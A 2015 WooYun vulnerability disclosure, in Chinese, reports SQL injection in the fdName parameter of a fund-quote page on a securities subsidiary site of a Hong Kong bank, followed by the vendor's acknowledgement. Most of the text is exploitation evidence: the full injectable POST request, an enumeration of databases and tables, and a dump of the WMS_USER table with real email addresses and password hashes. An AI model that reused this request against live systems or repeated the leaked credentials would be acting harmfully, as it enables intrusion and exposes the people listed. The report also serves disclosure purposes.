香港第一銀行某站SQL注射洩露大量信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152426

漏洞标题：香港第一銀行某站SQL注射洩露大量信息

漏洞作者： JulyTornado

提交时间：2015-11-06 20:06

修复时间：2015-12-24 13:08

公开时间：2015-12-24 13:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-06：细节已通知厂商并且等待厂商处理中
2015-11-09：厂商已经确认，细节仅向厂商公开
2015-11-19：细节向核心白帽子及相关领域专家公开
2015-11-29：细节向普通白帽子公开
2015-12-09：细节向实习白帽子公开
2015-12-24：细节向公众公开

简要描述：

香港第一銀行旗下第一金和昇證券有限公司某站存在SQL注射，洩露大量信息

详细说明：

香港第一銀行旗下第一金和昇證券有限公司
首頁 > 每日報價 > 基金報價處，參數fdName存在SQL注射，數據庫為Oracle：

POST /wfc-fws/wfc/wfcSearchFund.jsp HTTP/1.1
Host: fc09.etwealth.com
Content-Length: 144
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://fc09.etwealth.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36 CoolNovo/2.0.9.20
Content-Type: application/x-www-form-urlencoded
Referer: http://fc09.etwealth.com/wfc-fws/wfc/wfcSearchFund.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=AB05C44B920F08FA371DD8F5141716C2
fdName=xzcx&fdHseId=&location=&childLoc=&assetType=&sector=&searchFlag=Y&sortProperty=&sort=&page=&locale=zh_TW

工具驗證結果：

漏洞证明：

available databases [20]:
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] MNCIS_FC05_DBO
[*] MNCIS_FC06_DBO
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WK_TEST
[*] WKSYS
[*] WMS_FC05_DBO
[*] WMS_FC06_DBO
[*] WMS_FC08_DBO
[*] XDB
Database: WMS_FC05_DBO                                                                
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| WMS_FD_ACCESS_LOG              | 1482401 |
| WMS_NEWS_DTL                   | 788800  |
| WMS_FD_SHEET                   | 721156  |
| WMS_FD_ACCESS_STAT_MVIEW       | 484999  |
| WMS_NEWS_CAT                   | 307286  |
| WMS_FD_ALLOC                   | 247917  |
| WMS_FD_SHEET_LATEST_MVIEW      | 98934   |
| WMS_NEWS_COMMENT               | 64810   |
| WMS_FD_DIVIDEND                | 56121   |
| WMS_FD_SHEET_20061204          | 50738   |
| WMS_NEWS_STOCK                 | 45493   |
| WMS_FUND_STATUS_APP            | 37572   |
| WMS_FD_BENCHMARK               | 36756   |
| WMS_INSTR_STATUS_APP           | 32703   |
| WMS_INSTR_STATUS_APP_150604    | 32353   |
| WMS_INSTR_STATUS_APP_150603    | 32348   |
| WMS_INSTR_STATUS_APP_1506032   | 32348   |
| WMS_EQUITY_DESC                | 30363   |
| WMS_INSTR_STATUS_APP_130724    | 29718   |
| WMS_INSTR_STATUS_APP_20110704  | 26008   |
| WMS_INSTR_STATUS_APP_X         | 25543   |
| WMS_FD_PERFORM                 | 22036   |
| WMS_INSTR_STATUS_APP_20081223  | 21837   |
| WMS_FD_DESC                    | 20598   |
| WMS_FD_SUPPORT                 | 20598   |
| WMS_MPF_ALLOC_DESC             | 19014   |
| SCB_DATAFEED_VIEW              | 15660   |
| WMS_EQUITY                     | 10121   |
| WMS_FD_NEWS_CAT                | 9262    |
| WMS_MST_FD_MGR_DESC            | 9018    |
| WMS_FD_MGR_ASSOC               | 8605    |
| WMS_INSTR_STATUS               | 8506    |
| WMS_FUND                       | 6866    |
| WMS_FD_PRICE                   | 6712    |
| WMS_FD_PERFORM_CALC            | 6598    |
| WMS_STG_FD_PERFORM_CALC        | 6598    |
| WMS_FUND_X                     | 5430    |
| AUDIT_HOUSEKEEP                | 5412    |
| WMS_FD_RATING                  | 5378    |
| WMS_SAV_PLAN_FUND_ASSOC        | 5255    |
| WMS_MPF_ALLOCATION             | 3978    |
| WMS_MST_HOLIDAY_DESC           | 3738    |
| WMS_MFD_PERFORM                | 3298    |
| WMS_MST_FD_MGR                 | 3006    |
| WMS_MFD_DESC                   | 2790    |
| WMS_FD_HSE_AWARD               | 2475    |
| WMS_MFD_SHEET                  | 2076    |
| WMS_MPF_DETAIL_DESC            | 1767    |
| WMS_MPF_DESC                   | 1734    |
| WMS_MPF_STAR_RANKING           | 1484    |
| WMS_MST_HOLIDAY                | 1246    |
| WMS_MIRROR_FUND                | 930     |
| WMS_MFD_PRICE                  | 921     |
| WMS_MPF_NEWS_CAT               | 891     |
| WMS_MST_INDEX_STOCK            | 888     |
| WMS_CALC_PORT_DTL              | 887     |
| WMS_MST_INDEX_DESC             | 827     |
| WMS_MST_CIS_COUNTRY_DESC       | 724     |
| WMS_MST_COUNTRY_DESC           | 724     |
| WMS_CUST_RISK_ANS              | 722     |
| WMS_SEARCH_DIRECT_FUND         | 600     |
| WMS_MPF_FAMILY                 | 553     |
| WMS_MPF_PRICE                  | 548     |
| WMS_MPF                        | 520     |
| WMS_MPF_DETAIL                 | 520     |
| WMS_CALC_PORT_ASSET            | 489     |
| WMS_MST_CIS_CURRENCY_DESC      | 480     |
| WMS_MST_CURRENCY_DESC          | 471     |
| WMS_MST_FD_HSE_DESC            | 453     |
| WMS_MST_CITY_DESC              | 447     |
| BAK_EDU                        | 427     |
| WMS_SIMP_PORT_HOLD             | 377     |
| WMS_MST_EDU_DESC               | 351     |
| WMS_CALC                       | 345     |
| WMS_SEARCH_BASE_FUND           | 345     |
| WMS_MST_FD_CAT_BCHMRK          | 336     |
| WMS_BACKTEST_PORT_FD           | 319     |
| WMS_CUST_RISK_ANS_RPT          | 309     |
| WMS_ELNELI_PRICE               | 283     |
| WMS_MST_EPRC_DIST_DESC         | 282     |
| WMS_MST_INDEX                  | 281     |
| WMS_ROLE_ACCESS                | 247     |
| WMS_MST_CIS_COUNTRY            | 242     |
| WMS_MST_COUNTRY                | 242     |
| WMS_CUST_RISK                  | 234     |
| WMS_CALC_RTN_PROJ_DTL          | 218     |
| WMS_FD_HSE                     | 212     |
| WMS_CUST_REL                   | 201     |
| WMS_FD_ACCESS_LOG_20100331     | 200     |
| WMS_MST_NEWS_CAT_DESC          | 183     |
| WMS_MST_FD_CAT_DESC            | 177     |
| WMS_TEAM_RELATION              | 166     |
| WMS_CALC_PORT                  | 164     |
| WMS_MST_CIS_CURRENCY           | 160     |
| WMS_MST_CURRENCY               | 157     |
| WMS_MST_PROD_PDF_SECTION       | 156     |
| WMS_MST_FD_HSE                 | 151     |
| WMS_MST_CITY                   | 149     |
| WMS_NEWS_TOPIC                 | 140     |
| WMS_ELNELI_DESC                | 132     |
| WMS_SAVINGS_PLAN_DESC          | 132     |
| WMS_USER                       | 129     |
| WMS_USER_ROLE                  | 129     |
| WMS_MPF_PLAN_DESC              | 125     |
| WMS_FD_INVEST                  | 123     |
| WMS_MST_EDU                    | 117     |
| WMS_BACKTEST_PORT              | 116     |
| WMS_BD_DESC                    | 114     |
| WMS_MST_BD_RATING              | 114     |
| WMS_MPF_LOCATION_DESC          | 111     |
| WMS_MST_FD_LOC_DESC            | 111     |
| WMS_MST_RISK_ANS_DESC          | 111     |
| WMS_STG_RISK_ANS_DESC          | 111     |
| WMS_CALC_INST_EARNING          | 109     |
| WMS_ILP_FD                     | 106     |
| WMS_MST_FOREX                  | 100     |
| WMS_SIMP_PORT                  | 99      |
| WMS_MST_EPRC_DIST              | 94      |
| WMS_BD_SHEET                   | 93      |
| WMS_SYS_PARAM                  | 85      |
| WMS_MST_PRODUCT_DESC           | 84      |
| WMS_CUST_STATEMENT             | 82      |
| WMS_MST_CAMPAIGN_RESP_DESC     | 81      |
| WMS_CUST_RISK_RPT              | 77      |
| WMS_FD_BASKET                  | 76      |
| WMS_MPF_CAT_DESC               | 72      |
| WMS_MPF_PROVIDER_DESC          | 65      |
| WMS_MPF_LOCATION_LKUP          | 61      |
| WMS_MST_FD_LOC_LKUP            | 61      |
| WMS_MST_NEWS_CAT               | 61      |
| WMS_SAV_PLAN_SHEET             | 60      |
| WMS_BD_MERCHANT                | 59      |
| WMS_MST_FD_CAT                 | 59      |
| WMS_MST_RISK_LEVEL_DESC        | 57      |
| WMS_MST_EDU_GEN_DESC           | 54      |
| WMS_MPF_BENCHMARK              | 51      |
| WMS_CALC_REG_SAVING            | 49      |
| WMS_MST_INSUR_ABEN_DESC        | 48      |
| WMS_STG_PROD_INSUR_BAND        | 46      |
| WMS_ELNELI                     | 44      |
| WMS_SAVINGS_PLAN               | 44      |
| WMS_INDEX                      | 43      |
| WMS_MST_DOMICILE_DESC          | 42      |
| WMS_MST_FD_SECTOR_DESC         | 42      |
| WMS_MPF_SECTOR_DESC            | 39      |
| WMS_BOND                       | 38      |
| WMS_MST_CD_RATING              | 38      |
| WMS_MST_ISEARCH_SRC            | 38      |
| WMS_MPF_LOCATION               | 37      |
| WMS_MPF_PLAN                   | 37      |
| WMS_MST_FD_LOC                 | 37      |
| WMS_MST_RISK_ANS               | 37      |
| WMS_STG_RISK_ANS               | 37      |
| WMS_BANK_RATES                 | 36      |
| WMS_BD_RATING                  | 34      |
| WMS_MST_FD_RATING              | 34      |
| WMS_MST_RISK_QUESTION          | 33      |
| WMS_STG_RISK_QUESTION          | 33      |
| WMS_MST_FD_SHEET_DESC          | 30      |
| WMS_NEWS_BOOKMARK              | 30      |
| WMS_MST_PRODUCT                | 28      |
| WMS_MPF_SHEET_NAME_DESC        | 27      |
| WMS_MST_CAMPAIGN_RESP          | 27      |
| WMS_MST_INSTR_CURRENCY         | 27      |
| WMS_MST_SAV_PLAN_PROVIDER_DESC | 27      |
| WMS_BD_NEWS_CAT                | 26      |
| WMS_GFD_BASKET                 | 25      |
| WMS_MST_METHOD                 | 25      |
| WMS_MST_SERVICE                | 25      |
| WMS_BD_ISSUER_DESC             | 24      |
| WMS_MPF_ASSET_TYPE_DESC        | 24      |
| WMS_MPF_CATEGORY               | 24      |
| WMS_MST_FUTURE_NEED_DESC       | 24      |
| WMS_MST_PROD_TYPE_DESC         | 24      |
| WMS_CIS_SYNC_CONTROL           | 21      |
| WMS_MST_FD_ASSET_DESC          | 21      |
| WMS_MST_ISEARCH_CRIT           | 21      |
| WMS_MST_NEED_ASSET_DESC        | 21      |
| WMS_MST_ROLE_DESC              | 21      |
| WMS_MPF_PROVIDER               | 20      |
| WMS_MST_RISK_LEVEL             | 19      |
| WMS_CALC_RTN_PROJ              | 18      |
| WMS_MST_CD_FREQ_DESC           | 18      |
| WMS_MST_EDU_GEN                | 18      |
| WMS_MST_EXPENSE_TYPE_DESC      | 18      |
| WMS_MST_FD_DIV_POLICY_DESC     | 18      |
| WMS_MST_INSURANCE_TYPE_DESC    | 18      |
| WMS_MST_LIABILITY_TYPE_DESC    | 18      |
| WMS_MST_RISK_ALLOC             | 18      |
| WMS_MST_RISK_DESC              | 18      |
| WMS_MST_SYMPTOM_DESC           | 18      |
| WMS_MST_INSUR_ABEN             | 16      |
| WMS_CUST_SCHEDULE_ALERT        | 15      |
| WMS_MPF_STAR_RANK              | 15      |
| WMS_MST_DISPLAY_GRP_DESC       | 15      |
| WMS_MST_PROD_NEED_DESC         | 15      |
| WMS_MST_QUALI_DESC             | 15      |
| WMS_USER_130822                | 15      |
| WMS_USER_ROLE_130822           | 15      |
| WMS_CD_BASKET                  | 14      |
| WMS_MST_DOMICILE               | 14      |
| WMS_MST_FD_SECTOR              | 14      |
| WMS_TEAM_RELATION_130822       | 14      |
| WMS_MPF_SECTOR                 | 13      |
| WMS_MST_ASSET_DESC             | 12      |
| WMS_MST_COMPLIANCE_DESC        | 12      |
| WMS_MST_EPRC_REG_DESC          | 12      |
| WMS_MST_EXPENSE_SRC_DESC       | 12      |
| WMS_MST_INCOME_SRC_DESC        | 12      |
| WMS_MST_INSUR_DBEN_DESC        | 12      |
| WMS_MST_INSUR_PROD_TYPE_DESC   | 12      |
| WMS_MST_INSURANCE_BEN_DESC     | 12      |
| WMS_MST_PROD_RETURN_DESC       | 12      |
| WMS_MPF_RATE                   | 10      |
| WMS_MST_FD_SHEET               | 10      |
| WMS_MST_ISEARCH_VAL            | 10      |
| WMS_FOREX_BASIC                | 9       |
| WMS_MPF_SHEET_NAME             | 9       |
| WMS_MST_INCOME_TYPE_DESC       | 9       |
| WMS_MST_INSUR_CONVERT_DESC     | 9       |
| WMS_MST_INV_ASSET_DESC         | 9       |
| WMS_MST_ISEARCH_OP             | 9       |
| WMS_MST_SAV_PLAN_PROVIDER      | 9       |
| WMS_BD_ISSUER                  | 8       |
| WMS_MPF_ASSET_TYPE             | 8       |
| WMS_MST_FUTURE_NEED            | 8       |
| WMS_MST_PROD_TYPE              | 8       |
| WMS_MST_FD_ASSET               | 7       |
| WMS_MST_NEED_ASSET             | 7       |
| WMS_MST_ROLE                   | 7       |
| WMS_MST_SYMPTOM                | 7       |
| WMS_MST_ASSET_CLASS_DESC       | 6       |
| WMS_MST_CD_FREQ                | 6       |
| WMS_MST_DISPLAY_SUBGRP_DESC    | 6       |
| WMS_MST_EXPENSE_TYPE           | 6       |
| WMS_MST_FD_DIV_POLICY          | 6       |
| WMS_MST_FD_INV_ATTR_DESC       | 6       |
| WMS_MST_GROUP                  | 6       |
| WMS_MST_INSURANCE_TYPE         | 6       |
| WMS_MST_LIABILITY_CLASS_DESC   | 6       |
| WMS_MST_LIABILITY_TYPE         | 6       |
| WMS_MST_PROD_NATURE_DESC       | 6       |
| WMS_MST_RISK                   | 6       |
| WMS_STG_PROD_INSUR_FACTOR      | 6       |
| WMS_CALC_INSUR                 | 5       |
| WMS_GROUP_RELATION             | 5       |
| WMS_MST_DISPLAY_GRP            | 5       |
| WMS_MST_FD_RISK                | 5       |
| WMS_MST_PROD_NEED              | 5       |
| WMS_MST_QUALI                  | 5       |
| WMS_SYS_PARAM_APP              | 5       |
| WMS_TEAM_USER_QUALI            | 5       |
| WMS_MPF_ALLOC_CODE_DESC        | 4       |
| WMS_MST_ASSET                  | 4       |
| WMS_MST_COMPLIANCE             | 4       |
| WMS_MST_EPRC_REG               | 4       |
| WMS_MST_EXPENSE_SRC            | 4       |
| WMS_MST_INCOME_SRC             | 4       |
| WMS_MST_INSUR_DBEN             | 4       |
| WMS_MST_INSUR_PROD_TYPE        | 4       |
| WMS_MST_INSURANCE_BEN          | 4       |
| WMS_MST_PROD_RETURN            | 4       |
| WMS_MST_INCOME_TYPE            | 3       |
| WMS_MST_INSUR_CONVERT          | 3       |
| WMS_MST_INV_ASSET              | 3       |
| WMS_MST_LOCALE                 | 3       |
| WMS_STG_PROD_TYPE_DESC         | 3       |
| WMS_CALC_INSUR_ILP_BASKET      | 2       |
| WMS_CIS_DOMAIN_PRIORITY        | 2       |
| WMS_FD_INV_ATTR                | 2       |
| WMS_MST_ASSET_CLASS            | 2       |
| WMS_MST_DISPLAY_SUBGRP         | 2       |
| WMS_MST_FD_INV_ATTR            | 2       |
| WMS_MST_LIABILITY_CLASS        | 2       |
| WMS_MST_PROD_NATURE            | 2       |
| WMS_STG_PROD_INSUR_FACE        | 1       |
| WMS_STG_PROD_INSUR_RATE        | 1       |
| WMS_STG_PROD_TYPE              | 1       |
| WMS_STG_PROD_TYPE_QUALI        | 1       |
+--------------------------------+---------+
[06:01:26] [WARNING] reflective value(s) found and filtering out
Database: WMS_FC05_DBO
Table: WMS_USER
[20 columns]
+---------------------+----------+
| Column              | Type     |
+---------------------+----------+
| BACKUP_USER_ID      | VARCHAR2 |
| CN_NAME             | VARCHAR2 |
| CREATED_BY          | VARCHAR2 |
| CREATION_TIME       | DATE     |
| EMAIL               | VARCHAR2 |
| EN_FIRST_NAME       | VARCHAR2 |
| EN_LAST_NAME        | VARCHAR2 |
| GROUP_ID            | VARCHAR2 |
| LAST_ACCESS_TIME    | DATE     |
| LAST_LOGIN_TIME     | DATE     |
| LOGIN_FAIL_COUNT    | NUMBER   |
| LOGIN_SUCCESS_COUNT | NUMBER   |
| PARENT_ID           | VARCHAR2 |
| PASSWORD            | VARCHAR2 |
| PHONE               | VARCHAR2 |
| SERVICE_DATE        | DATE     |
| SESSION_ID          | VARCHAR2 |
| SESSION_LOGIN_TIME  | DATE     |
| STATUS              | VARCHAR2 |
| USER_ID             | VARCHAR2 |
+---------------------+----------+
+-----------+----------+-----------+------------+----------------+-------+--------------------------+--------+---------+----------------------------------+------------+--------------+--------------+---------------+------------------+-----------------+------------------+------------------+--------------------+---------------------+
| USER_ID   | GROUP_ID | PARENT_ID | SESSION_ID | BACKUP_USER_ID | PHONE | EMAIL                    | STATUS | CN_NAME | PASSWORD                         | CREATED_BY | EN_LAST_NAME | SERVICE_DATE | CREATION_TIME | EN_FIRST_NAME    | LAST_LOGIN_TIME | LAST_ACCESS_TIME | LOGIN_FAIL_COUNT | SESSION_LOGIN_TIME | LOGIN_SUCCESS_COUNT |
+-----------+----------+-----------+------------+----------------+-------+--------------------------+--------+---------+----------------------------------+------------+--------------+--------------+---------------+------------------+-----------------+------------------+------------------+--------------------+---------------------+
| bocomfc   | bocom    | bocombm01 | NULL       | NULL           | NULL  | naomilee@hket.com        | N      | NULL    | 1ba2b47ab458cd03d54c4f1ce6397921 | etwsa01    | BOCOM FC     | 23-AUG-13    | 23-AUG-13     | NULL             | 05-NOV-15       | NULL             | 0                | 06-NOV-15          | 700                 |
| 7392      | bocom    | bocombm01 | NULL       | NULL           | NULL  | angusso@hket.com         | N      | NULL    | 4823e0440e39a513ca817779e47668aa | etwsa01    | BOCOM FC     | 16-JUN-14    | 16-JUN-14     | 7392             | 03-NOV-15       | NULL             | 0                | 06-NOV-15          | 615                 |
| 7578      | bocom    | bocombm01 | NULL       | NULL           | NULL  | angusso@hket.com         | N      | NULL    | b2a2d9d0f92d9698e9fa33f78a6e79f7 | etwsa      | BOCOM FC     | 13-NOV-14    | 13-NOV-14     | 7578             | 06-NOV-15       | NULL             | 0                | 06-NOV-15          | 358                 |
| 6512      | bocom    | bocombm01 | NULL       | NULL           | NULL  | angusso@hket.com         | N      | NULL    | def5b67ae1f2d0aad53ad41c61a695a3 | etwsa      | BOCOM FC     | 22-MAY-15    | 22-MAY-15     | 6512             | 06-NOV-15       | NULL             | 0                | 06-NOV-15          | 390                 |
| 7838      | bocom    | bocombm01 | NULL       | NULL           | NULL  | jonathankow@hket.com     | N      | NULL    | 888deacdeb57ea39de887ce26af36da9 | etwsa01    | BOCOM FC     | 16-JUN-15    | 16-JUN-15     | 7838             | 02-NOV-15       | NULL             | 0                | 04-NOV-15          | 113                 |
| 7301      | bocom    | bocombm01 | NULL       | NULL           | NULL  | angusso@hket.com         | R      | NULL    | c4114ca2b2499ee27d94077bd24d3ec2 | etwsa01    | BOCOM FC     | 28-JAN-14    | 28-JAN-14     | 7301             | 09-MAY-14       | NULL             | 0                | 12-MAY-14          | 57                  |
| 7255      | bocom    | bocombm01 | NULL       | NULL           | NULL  | angusso@hket.com         | N      | NULL    | d211d1bf047814b75ad55b41097f6a77 | etwsa01    | BOCOM FC     | 28-JAN-14    | 28-JAN-14     | 7255             | 03-NOV-15       | NULL             | 0                | 05-NOV-15          | 220                 |
| 7459      | bocom    | bocombm01 | NULL       | NULL           | NULL  | angusso@hket.com         | N      | NULL    | 7d93c7bfae65257b8fc5e446e50a30e1 | etwsa      | BOCOM FC     | 14-AUG-14    | 14-AUG-14     | 7459             | 31-AUG-15       | NULL             | 0                | 31-AUG-15          | 279                 |
| 7599      | bocom    | bocombm01 | NULL       | NULL           | NULL  | angusso@hket.com         | N      | NULL    | 98bef0afb61dabf4f43dc583ce2c64ae | etwsa      | BOCOM FC     | 19-NOV-14    | 19-NOV-14     | 7599             | 05-NOV-15       | NULL             | 0                | 05-NOV-15          | 252                 |
| FC88      | etw      | NULL      | NULL       | NULL           | NULL  | NULL                     | N      | FC 88   | c21774cb9315d2b5a4dba417b91dfa13 | fcsa01     | FC 88        | 01-JUL-06    | 20-JUL-06     | NULL             | NULL            | NULL             | 0                | NULL               | 0                   |
| etwsa01   | etw      | NULL      | NULL       | NULL           | NULL  | trinalao@hket.com        | N      | NULL    | 1ba2b47ab458cd03d54c4f1ce6397921 | fcsa01     | ET Wealth    | 25-JUL-06    | 25-JUL-06     | SA 01            | 22-OCT-15       | NULL             | 0                | 29-OCT-15          | 178                 |
| fcsa      | etw      | NULL      | NULL       | NULL           | NULL  | virginialee@etwealth.com | R      | NULL    | bd8eb1e60dc1f257ec9c38897ed45748 | fcsa01     | ETW SA       | 02-AUG-06    | 02-AUG-06     | (CS)             | 01-JUN-10       | NULL             | 3                | 24-AUG-10          | 192                 |
| etwfc01   | etw      | FC88      | NULL       | NULL           | NULL  | NULL                     | N      | NULL    | 1ba2b47ab458cd03d54c4f1ce6397921 | fcsa       | ET Wealth    | 02-AUG-06    | 02-AUG-06     | FC 01            | 31-MAY-11       | NULL             | 0                | 06-SEP-13          | 47                  |
| etwfc02   | etw      | FC88      | NULL       | NULL           | NULL  | NULL                     | N      | NULL    | 36774102f14d5f9d8d0fe3e9c5d3b7f3 | fcsa       | ET Wealth    | 07-AUG-06    | 07-AUG-06     | FC 02            | NULL            | NULL             | 0                | 07-AUG-06          | 1                   |
| fwsps01   | fws      | NULL      | NULL       | NULL           | NULL  | trinalao@hket.com        | N      | NULL    | 47d1e38f0b8ed77db4eb2c828f1a2ccd | etwsa01    | fwsps01      | 22-DEC-08    | 22-DEC-08     | NULL             | 15-JUN-09       | NULL             | 1                | 08-JUL-11          | 9                   |
| fwsps     | fws      | NULL      | NULL       | NULL           | NULL  | trinalao@hket.com        | N      | NULL    | 1ba2b47ab458cd03d54c4f1ce6397921 | etwsa01    | FWS PS       | 22-DEC-08    | 22-DEC-08     | (Technical Team) | 16-JUN-14       | NULL             | 0                | 21-JAN-15          | 28                  |
| bocombm01 | bocom    | NULL      | NULL       | NULL           | NULL  | NULL                     | N      | NULL    | 4db3a56a8245ed5c8d0f328339ec95bf | etwsa01    | BOCOM        | 08-JUL-10    | 08-JUL-10     | BM 01            | NULL            | NULL             | 1                | NULL               | 0                   |
| bocomps01 | bocom    | NULL      | NULL       | NULL           | NULL  | trinalao@hket.com        | N      | NULL    | 7ae321044e20a01d10a4764ffa4a1c96 | etwsa01    | BOCOM        | 12-JUL-10    | 12-JUL-10     | PS 01            | 03-NOV-15       | NULL             | 0                | 03-NOV-15          | 527                 |
| bocomps   | bocom    | NULL      | NULL       | NULL           | NULL  | trinalao@hket.com        | N      | NULL    | 1ba2b47ab458cd03d54c4f1ce6397921 | etwsa01    | BOCOM PS     | 12-JUL-10    | 12-JUL-10     | (Technical Team) | 31-JUL-15       | NULL             | 0                | 03-AUG-15          | 125                 |
| bocomps02 | bocom    | NULL      | NULL       | NULL           | NULL  | trinalao@hket.com        | N      | NULL    | c054b6f705b8ccf83ed2e58849aa58b9 | etwsa01    | BOCOM        | 20-JUL-10    | 20-JUL-10     | PS 02            | 28-AUG-13       | NULL             | 0                | 06-SEP-13          | 9                   |
+-----------+----------+-----------+------------+----------------+-------+--------------------------+--------+---------+----------------------------------+------------+--------------+--------------+---------------+------------------+---------------

修复方案：

過濾危險字符或使用預編譯語句處理查詢，不深入了

版权声明：转载请注明来源 JulyTornado@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-11-09 13:08

厂商回复：

接到漏洞通報後已開始進行修補

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152426

漏洞标题：香港第一銀行某站SQL注射洩露大量信息

相关厂商：第一銀行

漏洞作者： JulyTornado

提交时间：2015-11-06 20:06

修复时间：2015-12-24 13:08

公开时间：2015-12-24 13:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 JulyTornado@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152426

漏洞标题：香港第一銀行某站SQL注射洩露大量信息

相关厂商：第一銀行

漏洞作者： JulyTornado

提交时间：2015-11-06 20:06

修复时间：2015-12-24 13:08

公开时间：2015-12-24 13:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0152426"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 JulyTornado@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：